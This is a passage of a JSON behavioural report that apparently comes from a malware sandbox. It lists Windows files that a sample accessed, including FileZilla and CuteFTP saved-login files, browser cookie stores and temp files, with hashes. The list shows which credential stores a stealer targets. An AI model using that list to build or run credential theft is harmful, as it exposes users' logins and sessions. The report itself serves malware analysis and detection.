"c:\\users\\aetadzjz\\appdata\\local\\filezilla\\sitemanager.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\recentservers.xml", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\filezilla\\recentservers.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\filezilla.xml", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\filezilla\\filezilla.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp pro\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp lite\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\CuteFTP\\sm.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\cuteftp\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat", "hashes": [], "norm_filename": "c:\\programdata\\globalscape\\cuteftp\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", "hashes": [], "norm_filename": "c:\\programdata\\globalscape\\cuteftp pro\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", "hashes": [], "norm_filename": "c:\\programdata\\globalscape\\cuteftp lite\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\CuteFTP\\sm.dat", "hashes": [], "norm_filename": "c:\\programdata\\cuteftp\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp pro\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\globalscape\\cuteftp lite\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\CuteFTP\\sm.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\cuteftp\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat", "hashes": [], "norm_filename": "c:\\program files (x86)\\globalscape\\cuteftp\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", "hashes": [], "norm_filename": "c:\\program files (x86)\\globalscape\\cuteftp pro\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP Lite\\sm.dat", "hashes": [], "norm_filename": "c:\\program files (x86)\\globalscape\\cuteftp lite\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\CuteFTP\\sm.dat", "hashes": [], "norm_filename": "c:\\program files (x86)\\cuteftp\\sm.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@g.live[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@g.live[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@google[1].txt", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "7372fbe29d49e31bd4002a12ff10b319", "sha1_hash": "b49450a4a7844b312769bd7ae0628aa1f0426efe", "sha256_hash": "1e52ee6f27cb7c984dc23b4cd48c641438fcff2a7dc3048b04fedc51476202c4", "type": "file_hash", "version": 1 }, { "md5_hash": "7e2935c87edf38621c63511a6cc5e1e3", "sha1_hash": "148686c9adafa08e6d55351479da7be5b0bcf064", "sha256_hash": "d08ddc5f3a9bb51961871f0b0a8c840adb5828c8a986f1a730e330fef876c44f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@google[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@live[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@live[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ad.360yield[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@ad.360yield[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ad13.adfarm1.adition[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@ad13.adfarm1.adition[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@addthis[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@addthis[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adfarm1.adition[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adfarm1.adition[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adformdsp[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adformdsp[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adform[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adform[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adnxs[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adnxs[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adscale[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adscale[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adserving.ancoraplatform[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adserving.ancoraplatform[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adsrvr[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adsrvr[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adtech[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adtech[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@advertising[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@advertising[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@angsrvr[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@angsrvr[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@api.bing[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@api.bing[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@at.atwola[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@at.atwola[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@bidswitch[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@bidswitch[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@bing[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@bing[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@bluekai[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@bluekai[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@bs.serving-sys[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@bs.serving-sys[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@bs.serving-sys[3].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@bs.serving-sys[3].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@c.bing[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@c.bing[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@c.msn[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@c.msn[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@c1.microsoft[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@c1.microsoft[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@casalemedia[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@casalemedia[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@connextra[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@connextra[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@crwdcntrl[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@crwdcntrl[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@demdex[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@demdex[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@doubleclick[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@doubleclick[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@dpm.demdex[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@dpm.demdex[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@exelator[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@exelator[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@eyeota[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@eyeota[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@google[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@google[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ibeu2.mookie1[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@ibeu2.mookie1[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ih.adscale[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@ih.adscale[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@linkedin[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@linkedin[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@m.exactag[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@m.exactag[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@mathtag[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@mathtag[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@microsoft[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@microsoft[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@msn[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@msn[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@openx[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@openx[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@pixel.rubiconproject[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@pixel.rubiconproject[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@pubmatic[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@pubmatic[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@rubiconproject[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@rubiconproject[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@scorecardresearch[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@scorecardresearch[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@semasio[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@semasio[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@server.adformdsp[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@server.adformdsp[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@serving-sys[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@serving-sys[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@serving.experianmarketingservices[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@serving.experianmarketingservices[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@smartadserver[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@smartadserver[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@tapad[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@tapad[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@track.adform[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@track.adform[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@turn[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@turn[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@w55c[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@w55c[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@www.bing[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@www.bing[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@www.linkedin[1].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@www.linkedin[1].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@www.msn[2].txt", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@www.msn[2].txt", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\cookies", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cooB07B.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "60492a553dc3492eaea00299b9976477", "sha1_hash": "296392a97cf91096c931293099654ac50dae95f3", "sha256_hash": "8491814b3ee58612f1ce1d20022263ae3817af78a69f03b1af5b5e299591f6a4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\coob07b.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB08D.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "c8c975ff6c535bb9e0d34a332b334e8f", "sha1_hash": "5bcbf5c63be57bb1512270a904424352081ab0ba", "sha256_hash": "863a31200bc0cdd3ea7ee31ab2f086e67ac5ca67c561ce925c7bf2f87dbf16fe", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08d.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB08E.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "7f420b843841e2e85c7a9c66d0d02fa4", "sha1_hash": "387c6e4328f6f441e32191f35f24bca95844ba69", "sha256_hash": "511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08e.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\cabB08F.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": 